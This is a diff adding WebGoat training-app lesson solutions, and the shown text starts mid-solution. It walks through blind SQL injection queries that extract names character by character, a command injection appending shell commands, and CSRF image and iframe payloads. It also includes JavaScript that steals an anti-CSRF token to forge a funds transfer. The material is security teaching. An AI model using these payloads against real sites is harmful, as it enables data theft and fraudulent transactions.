+substr((SELECT first_name FROM user_data WHERE userid=15613) , 1 , 1) ) < 77 );
+
+
+
+
+
If you get
+back that account number is valid, then yes. If get back that the number
+is invalid then answer is no.
+
+
Another
+example: is the second character of the first_name of userid 15613 greater than
+'m' (ascii 109)?
+
+
+
+
101 AND (ascii(
+substr((SELECT first_name FROM user_data WHERE userid=15613) , 2 , 1) ) > 109
+);
+
+
+
+
If you get back
+that account number is valid, then yes. If get back that the number is invalid
+then answer is no.
+
+
+
+
+
+
Figure 1 Lesson 16
+
+
For the
+query: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613)
+, 1 , 1) ) < 77 ); you will get a "Account number is valid". If the
+character is bigger then the value you get an invalid account error message.
+
+
+
+
+
+
Figure 2 Invalid account number
+
+
+
+
You can
+change the < to = to make sure that you have the correct value.
+
+
This results
+in the query 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
+userid=15613) , 1 , 1) ) = 74 );
+
+
+
+
+
+
Figure 3 First character
+
+
+
+
So you know
+that ascii(74) is capital J. Now do the same for the second and all other
+characters.
+
+
+
+
+
+
+
+
The query for
+the second character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
+userid=15613) , 2 , 1) ) = 111 );
+
+
Ascii(111) =
+o, so you have now Jo.
+
+
+
+
+
+
+
+
For the third
+character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
+userid=15613) , 3 , 1) ) = 101 ); Ascii(101) = e
+
+
For the
+fourth character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
+userid=15613) , 4 , 1) ) = 115 ); Ascii(115) = s
+
+
For the fifth
+character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
+userid=15613) , 5 , 1) ) = 112); Ascii(112) = p
+
+
For the sixth
+character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
+userid=15613) , 6 , 1) ) = 104); Ascii(104) = h
+
+
+
+
So the name
+that you found is Joesph. Enter this in the text field to complete this lesson.
+
+
+
+
+
+
Figure 4 Enter the name Joesph
+
+
+
+
+
+
Figure 5 Lesson 16 Completed
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image001.png
new file mode 100644
index 000000000..5fef4d85b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image003.png
new file mode 100644
index 000000000..950942ed9
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image005.png
new file mode 100644
index 000000000..8c3ee5181
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image007.png
new file mode 100644
index 000000000..54ea1bcb2
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image009.png
new file mode 100644
index 000000000..3668266c4
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image011.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image011.png
new file mode 100644
index 000000000..9987542b3
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image011.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image013.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image013.jpg
new file mode 100644
index 000000000..f5c8d4841
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image013.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image014.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image014.jpg
new file mode 100644
index 000000000..68702bb41
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image014.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image015.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image015.jpg
new file mode 100644
index 000000000..b6e84a5fe
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image015.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image016.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image016.jpg
new file mode 100644
index 000000000..93a58e837
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image016.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image017.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image017.jpg
new file mode 100644
index 000000000..6055cba63
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image017.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image018.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image018.jpg
new file mode 100644
index 000000000..2e2bf3fc5
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image018.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindStringSqlInjection.html b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindStringSqlInjection.html
new file mode 100644
index 000000000..844892b9d
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindStringSqlInjection.html
@@ -0,0 +1,42 @@
+
+
+
+Solution: Blind String SQL Injection
+Lesson Plan Title: Blind String SQL Injection
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution: 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'H' ); SUBSTRING(STRING,START,LENGTH) < 'L' returns true, so we know the letter is between H and L. With a few more queries, we can determine the first letter is J . Note that capitalization matters, and it's right to assume the first letter is capitalized.101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2 , 1) < 'h ' ); i . Note that we are comparing the second character to a lowercase h. Continue this process until you have the rest of the letters.
+The name is Jill . Enter this name to complete the lesson. Capitalization matters.
+
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions.html b/webgoat-5.4/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions.html
new file mode 100644
index 000000000..a0a7d4a84
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions.html
@@ -0,0 +1,37 @@
+
+
+
+Solution: Bypass HTML Field Restrictions
+Lesson Plan Title: Bypass HTML Field Restrictions
+
+Concept / Topic To Teach:
+
+General Goal(s): You must break all 6 validators at the same time .
+
+
+Solution: disabled="" parameter. This causes the field on the page to be unlocked, and will also cause the disabledinput variable to appear in Webscarab.Enabled input after removing the "disabled" parameter in Firebug. disabledinput .Correctly filled in request with all fields invalidated and the disabledinput variable added.
+
+
Lesson
+Plan Title: How to
+Perform Cross Site Request Forgery.
+
+
+
+
Concept
+/ Topic To Teach:
+
+
This
+lesson teaches how to perform Cross Site Request Forgery (CSRF) attacks.
+
+
+
+
How
+the attacks works:
+
+
Cross-Site
+Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a
+page that contains img links like the one below:
+
+
<img
+src=" http://www.mybank.com/sendFunds.do?acctId=123456 "/>
+
+
When
+the victim's browser attempts to render this page, it will issue a request to
+www.mybank.com to the transferFunds.do page with the specified parameters. The
+browser will think the link is to get an image, even though it actually is a
+funds transfer function. The request will include any cookies associated with
+the site. Therefore, if the user has authenticated to the site, and has either
+a permanent cookie or even a current session cookie, the site will have no way
+to distinguish this from a legitimate user request. In this way, the attacker
+can make the victim perform actions that they didn't intend to, such as logout,
+purchase item, or any other function provided by the vulnerable website
+
+
+
+
General
+Goal(s):
+
+
Your
+goal is to send an email to a newsgroup that contains an image whose URL is
+pointing to a malicious request. Try to include a 1x1 pixel image that includes
+a URL. The URL should point to the CSRF lesson with an extra parameter
+"transferFunds=4000". You can copy the shortcut from the left hand
+menu by right clicking on the left hand menu and choosing copy shortcut.
+Whoever receives this email and happens to be authenticated at that time will
+have his funds transferred. When you think the attack is successful, refresh
+the page and you will find the green check on the left hand side menu.Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
+
+
+
+
+
+
Figure 1 How to perform CSRF
+
+
+
+
Solution:
+
+
+
+
To
+complete this lesson you need to embed HTML code in the message box. This HTML
+code should contain a image tag linking to an URL that is not a real image will but start a transaction on the web
+server instead.
+
+
+
+
The
+format of an image in html is <img src="[URL]" width="1"
+height="1" />
+
+
The transaction can be triggered by an URL to the
+current lesson and an extra parameter "transferFunds" and the amount. The
+width=1 and height=1 will not show the image.
+
+
+
+
This payload will work:
+
+
<img
+src="http://localhostattack?Screen=81&menu=210&transferFunds=5000"
+width="1" height="1" />
+
+
+
+
So create a new message with title "Test" and a
+message with the payload.
+
+
+
+
Figure 2 Insert payload
+
+
+
+
The page will refresh and you will see a new message
+in the message list.
+
+
+
+
+
+
Figure 3 New message test
+
+
+
+
Click
+on the message test. This will download the message and display the contents as
+HTML, executing the payload. Examine the HTTP Request in WebScarab that is
+generated when the browers tries to render the image tag.
+
+
+
+
+
+
Figure 4 CSRF attack
+
+
+
+
Now
+you need to refresh the page to get the green star next to the lesson.
+
+
+
+
+
+
Figure 5 Lesson completed
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image001.png
new file mode 100644
index 000000000..9d82bd95a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image003.png
new file mode 100644
index 000000000..2189df262
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image005.png
new file mode 100644
index 000000000..95949f62b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image007.png
new file mode 100644
index 000000000..7bf06a985
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image009.png
new file mode 100644
index 000000000..d0e2f233c
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image011.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image011.jpg
new file mode 100644
index 000000000..fbb254bd8
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image011.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image012.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image012.jpg
new file mode 100644
index 000000000..32dbb3c02
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image012.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image013.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image013.jpg
new file mode 100644
index 000000000..8d76909d8
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image013.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image014.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image014.jpg
new file mode 100644
index 000000000..be9c8e294
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image014.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image015.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image015.jpg
new file mode 100644
index 000000000..ef71f6923
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/image015.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CSRF_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ClientSideFiltering.html b/webgoat-5.4/src/main/webapp/lesson_solutions/ClientSideFiltering.html
new file mode 100644
index 000000000..fe08a4bdf
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/ClientSideFiltering.html
@@ -0,0 +1,84 @@
+
+
+
+Client Side Filtering
+Lesson Plan Title: Client Side Filtering
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution:
+This Lab consists of two Stages. In the first Stage you have to
+get sensitive information . In the second one you have to fix the problem.
+Stage 1
+
+Use Firebug to solve this stage. If you are using IE you can try it with
+IEWatch.
+
+First use any person from the list and see what you get. After doing this you
+can search for a specific person in Firebug. Make sure you find the hidden table with
+the information, including the salary and so on. In the same table you will find
+Neville.
+
+Inspect HTML on Firebug
+Now write the salary into the text edit box and submit your answer!
+
+Stage 2
+
+In this stage you have to modify the clientSideFiltering.jsp which you will find under
+the WebContent in the lessons/Ajax folder. The Problem is that
+the server sends all information to the client. As you could see
+even if it is hidden it is easy to find the sensitive date. In this
+stage you will add a filter to the XPath queries. In this file you will find
+following construct:
+
+ StringBuffer sb = new StringBuffer();
+
+This string will be used for the XPath query. You have to guarantee that a manger only
+can see employees which are working for him. To archive this you can use
+filters in XPath. Following code will exactly do this:
+
+ StringBuffer sb = new StringBuffer();
+
+Now only information is sent to your client you are authorized for. You can click on the button.
+
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg
new file mode 100644
index 000000000..e51a40ad0
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ClientSideValidation.html b/webgoat-5.4/src/main/webapp/lesson_solutions/ClientSideValidation.html
new file mode 100644
index 000000000..b23fb0875
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/ClientSideValidation.html
@@ -0,0 +1,64 @@
+
+
+
+Insecure Client Storage
+Lesson Plan Title: Insecure Client Storage
+
+Concept / Topic To Teach:
+
+
+
+General Goal(s):
+
+Solution:
+
+Stage 1
+
+First we want to try to get a coupon code to get something cheaper. Open
+Firebug and click on the Script Tab. Make sure you choose clientSideValidation.js
+on the dropdown list. Toggle a breakpoint on the line:decrypted = decrypt(coupons[i]);
+Now enter a character in the coupon code field. The Javascript gets executed
+but stops at the breakpoint. On the right side you see the parameters
+and there values. Now use the step over symbol or F10. Now you can read
+the clear text of decrypted:
+Figure 1 Firebug in action
+Now that you know the coupon name enter it in the coupon field, purchase something
+and you are done.
+
+
+Stage 2
+
+You can not edit the Prices in the Shopping Cart. The reason is that the readonly
+attribute is set for this field.
+
+To get rid of this attribute open Firebug. Make sure this time you use
+the HTML View. You can directly in
+Firebug search for readonly and elemenate this attribute.The field for the total is
+called GRANDTOT. After having deleted the readonly attribute from GRANDTOT
+it is possible to change the price directly in the browser. Select any products
+you like, change the total field to 0 and hit the purchase button.
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png
new file mode 100644
index 000000000..e8f391339
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection.html b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection.html
new file mode 100644
index 000000000..7e19dd78a
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection.html
@@ -0,0 +1,739 @@
+
+
+
+Solution: Command Injection
+
+
+
Lesson Plan Title: How to Perform Command Injection
+
+
+
+
Concept / Topic To Teach:
+
+
Command
+injection attacks represent a serious threat to any parameter-driven site. The methods
+behind an attack are easy to learn and the damage caused can range from
+considerable to complete system compromise. Despite these risks an incredible
+number of systems on the internet are susceptible to this form of attack.
+
+
+
+
Not only is
+it a threat easily instigated, it is also a threat that, with a little
+common-sense and forethought, can be almost totally prevented. This lesson will
+show the student several examples of parameter injection.
+
+
+
+
It is always
+good practice to sanitize all input data, especially data that will used in OS
+command, scripts, and database queries.
+
+
+
+
General Goal(s):
+
+
The user
+should be able to execute any command on the hosting OS.
+
+
+
+
+
+
Figure 1 Lesson 16
+
+
+
+
Solution:
+
+
+
+
Select a
+lesson from the drop-down box and click on "View".
+
+
+
+
+
+
+
+
Intercept the
+request with WebScarab when you click on "View". Append " & netstat -an
+& ipconfig to the HelpFile parameter. Do not forget the double quote!
+
+
+
+
+
+
Figure 2 Injecting command netstat & ipconfig
+
+
+
+
The result
+contains the output of the command netstat and ipconfig.
+
+
+
+
+
+
Figure 3 Command Injection results
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image001.png
new file mode 100644
index 000000000..95185ac08
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image003.png
new file mode 100644
index 000000000..bb6e1e518
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image005.png
new file mode 100644
index 000000000..9c7ecd242
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image007.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image007.jpg
new file mode 100644
index 000000000..d82452e33
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image007.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image008.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image008.jpg
new file mode 100644
index 000000000..67162e723
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image008.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image009.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image009.jpg
new file mode 100644
index 000000000..916c6fdc1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/image009.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CommandInjection_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ConcurrencyCart.html b/webgoat-5.4/src/main/webapp/lesson_solutions/ConcurrencyCart.html
new file mode 100644
index 000000000..2c19a9918
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/ConcurrencyCart.html
@@ -0,0 +1,32 @@
+
+
+
+Shopping Cart Concurrency Flaw
+Lesson Plan Title: Shopping Cart Concurrency Flaw
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution: Window A Window B Window A Success Client Side Filtering
+Lesson Plan Title: Prompt By-Pass with CSRF
+
+Concept / Topic To Teach:
+
+General Goal(s): Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
+
+
+Solution: Start by crafting an image or iframe tag similar to the CSRF LAB: <img
+src="http://localhostattack?Screen=81&menu=210&transferFunds=5000"
+width="1" height="1" />
+
+This image request will not result in a transfer of funds but will instead
+prompt the user for confirmation. To see the confirmation prompt, try typing in the URL of the
+Lesson with the extra parameter of "transferFunds=4000" User Prompt
+
+Next look at the source of the page to see what parameters the confirmation requires.
+The form in the confirmation prompt looks like the following:
+
+
+<form accept-charset ='UNKNOWN' method ='POST' action ='attack?Screen=5&menu=900' enctype ='application/x-www-form-urlencoded' >
+ <input name ='transferFunds' type ='submit' value ='CONFIRM' >
+ <input name ='transferFunds' type ='submit' value ='CANCEL' >
+</form >
+
+From this we see the next forged command will need the folllowing URL: attack?Screen=5&menu=900&transferFunds=CONFIRM
+<iframe
+ src ="http://localhost:8080/WebGoat/attack?Screen=5&menu=900&transferFunds=400"
+ id ="myFrame" frameborder ="1" marginwidth ="0"
+ marginheight ="0" width ="800" scrolling =yes height ="300"
+ onload ="document.getElementById('frame2').src='http://localhost:8080/WebGoat/attack?Screen=5&menu=900&transferFunds=CONFIRM';" >
+ </iframe >
+
+<iframe
+ id ="frame2" frameborder ="1" marginwidth ="0"
+ marginheight ="0" width ="800" scrolling =yes height ="300" >
+</iframe >
+
+
+
+Next add the iframes into a message stored on the web page:Insert iframes hack picture
+The following shows the result of clicking on the malicious iframe message:
+Results of iframes hack picture
+
+In a real attack these results would be hidden from the end user. Click "restart this lesson"
+to attempt the attack again, only this time try hiding the attack with hidden or very small frames.
+
+
+For images, loading an html page as an image will cause an error. So instead of using the onload attribute, use onerror:
+
+<img
+src="http://localhostattack?Screen=81&menu=210&transferFunds=5000"
+onerror="document.getElementById('image2').src='http://localhostattack?Screen=81&menu=210&transferFunds=CONFIRM'"
+width="1" height="1" />
+<img
+id="image2"
+width="1" height="1" />
+
+Picture of adding malicious image requests
+CSRF Token By-Pass
+Lesson Plan Title: CSRF Token Prompt By-Pass
+
+Concept / Topic To Teach:
+
+
+Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into
+loading a page that contains a 'forged request' to execute commands with the
+victim's credentials.
+
+Token-based request authentication deters these attacks. This technique
+inserts tokens into pages that issue requests. These tokens are required to
+complete a request, and help verify that requests are not scripted. CSRFGuard from OWASP uses
+this technique to help prevent CSRF attacks.
+
+However, this technique can be by-passed if CSS vulnerabilities exist on the same site.
+Because of the same-origin browser policy, pages from the same domain can read content from
+other pages from the same domain.
+
+General Goal(s): Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
+
+
+Solution: Similar to the CSRF LAB, you must forge a request that will transfer funds. However,
+a request will not result in a transfer of funds unless it has a correct token. To find
+a valid token, you could look at the form that the site generates to submit a transfer of funds.
+To see the transfer funds page, try typing in the URL of the Lesson with the extra parameter
+of "transferFunds=main" Transfer initiation form
+
+Next look at the source of the page to see what parameter the token comes in.
+
+<form accept-charset ='UNKNOWN' id ='transferForm' method ='POST' action ='attack?Screen=2&menu=900' enctype ='application/x-www-form-urlencoded' >
+ <input name ='transferFunds' type ='text' value ='0' >
+ <input name ='CSRFToken' type ='hidden' value ='1745740650' >
+ <input type ='submit' >
+</form >
+
+From this we see a forged command will need the CSRFToken parameter.
This solution loads this page in an iframe and reads the token out of the frame.
+Note that this is possible because the message originates from the same domain and
+does not violate the "same origin policy". So even thought this page has taken
+measures to prevent CSRF attacks, those measures can be side-stepped because of
+CSS vulnerabilites. To pull out the CSRFToken, the following javascript locates the
+frame, then the form, then saves the token
+
+
+var tokenvalue;
+
+function readFrame1()
+{
+ var frameDoc = document.getElementById("frame1").contentDocument;
+ var form = frameDoc.getElementsByTagName("form")[1];
+ var token = form.CSRFToken.value;
+ tokenvalue = '&CSRFToken='+token;
+
+ loadFrame2();
+}
+
+function loadFrame2()
+{
+ var testFrame = document.getElementById("frame2");
+ testFrame.src="http://localhost:8080/WebGoat/attack?Screen=212&menu=900&transferFunds=4000"+tokenvalue;
+}
+ readFrame1 will read the frame's content for the CSRFToken, save it and then call loadFrame2
+LoadFrame2 will then append the token and load a second frame.
+
+The following frames loads the transfer page in the first frame. When it finishes loading, it will
+call readFrame1, which calls loadFrame2, which then sets the src for the second iframe.
+
+
+<iframe src ="http://localhost:8080/WebGoat/attack?Screen=212&menu=900&transferFunds=main"
+ onload ="readFrame1();"
+ id ="frame1" frameborder ="1" marginwidth ="0"
+ marginheight ="0" width ="800" scrolling =yes height ="300" ></iframe >
+<iframe id ="frame2" frameborder ="1" marginwidth ="0"
+ marginheight ="0" width ="800" scrolling =yes height ="300" ></iframe >
+
+
+
+The next picture shows inserting this code into a message:Inserting CSRF code into message
The next picture shows inserting this code into a message:Results of viewing the malicious message
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHack.png b/webgoat-5.4/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHack.png
new file mode 100644
index 000000000..8e2b1503e
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHack.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHacked.png b/webgoat-5.4/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHacked.png
new file mode 100644
index 000000000..e09a7fc57
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHacked.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenPage.png b/webgoat-5.4/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenPage.png
new file mode 100644
index 000000000..5c6927667
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenPage.png differ
